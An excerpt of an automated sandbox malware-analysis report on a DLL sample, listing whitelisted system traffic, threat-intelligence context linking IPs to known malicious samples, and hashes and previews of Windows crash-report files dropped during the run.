                        Show All
                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.89.179.12, 40.91.112.76, 52.251.79.25, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): fp.msedge.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, onedsblobprdcus17.centralus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, a-0019.a-msedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a-0019.standard.a-msedge.net, 1.perf.msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, t-ring.msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        00:54:39API Interceptor1x Sleep call for process: WerFault.exe modified
                        00:55:56API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        45.63.5.129efELSMI5R4.dllGet hashmaliciousBrowse

                          Domains

                          No context

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          AS-CHOOPAUSefELSMI5R4.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          ImSL42AOtZ.exeGet hashmaliciousBrowse
                          • 45.63.36.79
                          spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                          • 66.42.57.149
                          spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                          • 66.42.57.149
                          iU17wh2uUd.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          iU17wh2uUd.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          Sz4lxTmH7r.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          RFIlSRQKzj.exeGet hashmaliciousBrowse
                          • 45.32.115.235
                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          MMUc2aeWxZ.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          0pvsj0MF1D.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          Linux_amd64Get hashmaliciousBrowse
                          • 45.32.162.141
                          nkXzJnW7AH.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          67MPsax8fd.exeGet hashmaliciousBrowse
                          • 136.244.117.138
                          Linux_x86Get hashmaliciousBrowse
                          • 45.77.44.252
                          uI6mJo4TJQ.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          uI6mJo4TJQ.exeGet hashmaliciousBrowse
                          • 149.28.253.196
                          M2jG6lMe7Y.exeGet hashmaliciousBrowse
                          • 202.182.120.6

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          51c64c77e60f3980eea90869b68c58a8efELSMI5R4.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          fehiVK2JSx.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          kQ9HU0gKVH.exeGet hashmaliciousBrowse
                          • 45.63.5.129
                          gvtdsqavfej.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          mhOX6jll6x.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          dguQYT8p8j.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          jSxIzXfwc7.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          mhOX6jll6x.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          X2XCewI2Yy.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          dguQYT8p8j.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          HMvjzUYq2h.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          s9BZBDWmi4.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          bFx5bZRC6P.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          c7IUEh66u6.dllGet hashmaliciousBrowse
                          • 45.63.5.129
                          HMvjzUYq2h.dllGet hashmaliciousBrowse
                          • 45.63.5.129

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_88e9c9cb640b4f665f2020b110738337d7578_d70d8aa6_1abcca4e\Report.wer
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.6752625502343687
                          Encrypted:false
                          SSDEEP:96:CcDjZqy1y9hkoyt7Jf0pXIQcQ5c6A2cE2cw33+a+z+HbHgjVG4rmMOyWZAXGng5u:hBKHnM28jj/q/u7stS274ItW
                          MD5:25CC53A9A19F4661D37FA80AD23302F1
                          SHA1:33ECA18CB2A5714055E539CA8025E81FB2C758FC
                          SHA-256:236B1E7B6982B9AB6DC2CB26E142C055BBEFD18FF6BDB9F26EC019602C85AF75
                          SHA-512:B7D88A0100BE52C0D88FB5530991778B233E742E2D687B84C78ED1A0E6F3D6B5616225156D59DC67A00D11CA255FD073408F9D781BCBBB311A65107C84F8907C
                          Malicious:false
                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.7.6.4.6.0.6.8.0.2.7.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.2.5.0.8.d.c.-.b.3.4.8.-.4.8.6.8.-.9.4.9.6.-.3.9.c.f.e.f.9.4.3.5.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.c.8.e.3.1.4.-.5.0.f.1.-.4.b.4.2.-.a.b.3.2.-.9.6.a.5.3.6.8.7.8.3.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.b.-.2.3.c.1.-.6.3.7.2.0.e.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0d790757\Report.wer
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.6785382072555216
                          Encrypted:false
                          SSDEEP:96:CQfWFS5yBjZqyOy9hk1Dg3fWpXIQcQ55c65HcETcw3k+a+z+HbHgjVG4rmMOyWZD:qo5y7BWHpt5Oj/q/u7stS274ItWu
                          MD5:88F617AF6080EDEF1C47006810095DAA
                          SHA1:3D21887A9A4ED40A09AC5E34CEE78277A246C143
                          SHA-256:554270AFF664AAFFCD47524C00F1073E42E83E20CB55DAFB7A72781876A8669C
                          SHA-512:53CCBAB573B4D39E636957D64CCDCF32ABEDFD0827F4644CE2784C4BC1096E2C0D7D9C218493CFB9246045C0EF7AEBFAA957E909FAB7186E07B1E64CE15283C2
                          Malicious:false
                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.7.6.4.6.9.0.1.0.4.1.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.7.6.4.7.8.5.5.7.2.5.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.c.8.0.4.4.d.-.7.e.d.7.-.4.e.e.0.-.9.9.7.2.-.d.1.4.f.0.b.e.9.0.5.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.6.9.2.9.7.b.-.6.a.a.5.-.4.4.9.4.-.8.0.d.c.-.5.9.2.4.f.e.e.e.c.0.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.b.-.2.3.c.1.-.6.3.7.2.0.e.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER42EA.tmp.csv
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):50030
                          Entropy (8bit):3.054147686736165
                          Encrypted:false
                          SSDEEP:1536:KDHBHa6Nhq/xO6qJx7ZVUWy1aeQHQRq5FnwBc:KDHBHa6Nhq/xO6qJx7ZVUWy1aeQHQRqD
                          MD5:DB316FD905C5EEC16689FBF1188FF219
                          SHA1:E9B1316080E88C59E7A40FBBA7460625D30AE0A0
                          SHA-256:2BDF36F9AAAC312455E5758250AE9A86845C3E3F27CEFAE6E8F8530E0481C161
                          SHA-512:D0933B8AFF200BF926569B5BB346CE11808C732DBFFDC867C41837D97F28CFF6F3087745CA6E52157C1F5292948E9057918DC3328F3D88FE20FD513CEB398A75
                          Malicious:false
                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4731.tmp.txt
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13340
                          Entropy (8bit):2.695477969437785
                          Encrypted:false
                          SSDEEP:96:9GiZYWgxMOGLbY2YF7rW5H3YEZD/Ftk0i7PL+ywHrabP0aIDCZylOIBr3:9jZDrhIW/tEsaIDyylZBr3
                          MD5:1209E9856FAAC6EE0EBA4C9651FE3D2E
                          SHA1:1C287B56C1F4F1995A0BE8D4782C6C5BC380D20F
                          SHA-256:6E9CBD4477736F6D621027C286969B6CFBEAFA6AA92300A4F44E12598A20BAD1
                          SHA-512:0B725614CC5D8BBCA42AA5B49DE130FEFF8A642319C42C07C681726A393E20447327AF5275CC0ECD0278E1E5D538D7519B29ABA40EC34EA603B1E209946492BC
                          Malicious:false
                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6578.tmp.csv
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):49640
                          Entropy (8bit):3.0548950330398768
                          Encrypted:false
                          SSDEEP:1536:DFHpHg6Hk/xdqJm/6RGkUzy1aChH9JilOUEs:DFHpHg6Hk/xdqJm/6RGkUzy1aChH9JiF
                          MD5:7863E9D9221D3FBF2399DB5AF9DEF6B7
                          SHA1:2DD938F1431660404BE4B3EF39AA57E6C3FDD144
                          SHA-256:167A77564754A61CB6875DD0B654B29EDD3FC7E6DDD75FA82B5F21E4B6DB0B62
                          SHA-512:E2C0BB85E449DC3CD53F86A2FD00B2D0BCF6B747EFBE7BCBA1A2B0BB3FBCA9755C76B2946AFBAC34203F31F87C1EEF685EB7B3E577A98D6BCE1A95A46A98FB2E
                          Malicious:false
                          Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6896.tmp.txt
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13340
                          Entropy (8bit):2.6949302636440335
                          Encrypted:false
                          SSDEEP:96:9GiZYWQ0OZNLAY+GYPWOZHDYEZFUItFidPe+fw1LfaWGrfiwIhA3:9jZD3JGcUELaWGrfiHhA3
                          MD5:0DB248CBA273C43C6A6B69E38B7E724D
                          SHA1:9921F602B78EC02EFDEEF824E843544F4320952A
                          SHA-256:01AEDC7579FF57CDFDADED143AA5F40032984CEA68063CB658A2BAE76D8367FC
                          SHA-512:21AB0FC7B1E591EC6A91B2CEE377804FDDBE3855BB2227D93C9EF34D6E9EC7DE627C53A9B4414EE0B229368CF81B5C98F65152AF1BEB34DA278F1C3B95D35B30
                          Malicious:false
                          Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBD7.tmp.dmp
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 1 23:54:21 2021, 0x1205a4 type
                          Category:dropped
                          Size (bytes):25952
                          Entropy (8bit):2.5479659724080994
                          Encrypted:false
                          SSDEEP:192:TiDG6u6spOt1fhX7XAqki6+Hr38MuGe44NQ7y:PANrfl2iL38MuGe3
                          MD5:E1A30403EED9771979C9650D013EC47D
                          SHA1:076661FCF34BEF8F26632B0B057C674CF3EB4CC5
                          SHA-256:BC39011699A393049A13127695D3275B89C15DB4A64D057D66E9EC770D73B9FF
                          SHA-512:F4F17AD966CD71DAD028A582EC4BD2349DE1C0C63B6A8AA53E3505BEECAF149B12182D0B9C8560B0419F804F45927DAD3A689DDDCF16C475520885DC7F5F157B
                          Malicious:false
                          Preview: MDMP....... .......-..a............4...............H.......$...........................`.......8...........T...........h....X...........................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERBEC6.tmp.WERInternalMetadata.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8340
                          Entropy (8bit):3.703515995405675
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNi0d6Y6YrBSUKogmfOSz3+pBU89bKusfRum:RrlsNi+6Y6YtSUKogmfOSzgKtfB
                          MD5:45A99EB6F7CDE7E0DF4A21A1559328AB
                          SHA1:9465E6CB513F9B45CCF4D1FB0EF88C66DE804495
                          SHA-256:662E516BDCCF642EE2AD6CB7DCEE1335EE98068A32458DA8036C8C9A49468F87
                          SHA-512:205A9F77F77B2066F68306C34F5489C7D912C5A968270532A93DB56F3E09DC2076CFBEFC2981F167134F5AF1D09E3ADAE742DC4529878C832D4D5BD32387A942
                          Malicious:false
                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC34B.tmp.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4598
                          Entropy (8bit):4.478723336936157
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zs8JgtWI90CkgwSWSC8BgM8fm8M4J2yvZFP+q84WzZyKcQIcQwQyd:uITf6frgwzSNaxJBLwZyKkwQyd
                          MD5:65A742620F6F9B0AB1DA05AB57E36B71
                          SHA1:3E2CC66D1F3A55506A3B1AF09743A04127D46DF2
                          SHA-256:B5D59C26CC24E65876D68F0277C1707BB5AA9FBFBC8AC6BA143B2CA1C863F2DE
                          SHA-512:71ECC6CD82EC8BAE0757B6426C28646AC2EC3E6DE1C86BC5AEBB41F6E84C6611B87229E8090FBE87B2477361504B96C40E06F74AC910C68C1EB1E8ED8CBAA8F1
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279265" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC5F.tmp.dmp
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Dec 1 23:54:29 2021, 0x1205a4 type
                          Category:dropped
                          Size (bytes):1058968
                          Entropy (8bit):1.3634743704673724
                          Encrypted:false
                          SSDEEP:1536:v9+iGC6hao+C30BRC38srMs9TTfGdvblT98kLpvauTYLx05f:vPk36s38ITT0laUauE105f
                          MD5:36C4A2EFB238E98383A4DA1690926559
                          SHA1:62E82195C1A515A566E2A7ED27F8BE83B1D33783
                          SHA-256:FD1409A26E79C02A441D26CAE2BF474FE84D822607B0256F1B8BF59CFDAEF049
                          SHA-512:62294FBEC73AED3CD1C75D42F6DE49FCC22AE9F3FCD7474C5C886B3497A1F125966376A1398D849AF9C846B0F1E3F037B0118E9A563D52CC1CDA4B694200E0DE
                          Malicious:false
                          Preview: MDMP....... .......5..a............4...............H.......$...........................`.......8...........T...........@...X............................................................................................U...........B......p.......GenuineIntelW...........T..............a-............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE365.tmp.WERInternalMetadata.xml
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8300
                          Entropy (8bit):3.69335608268857
                          Encrypted:false
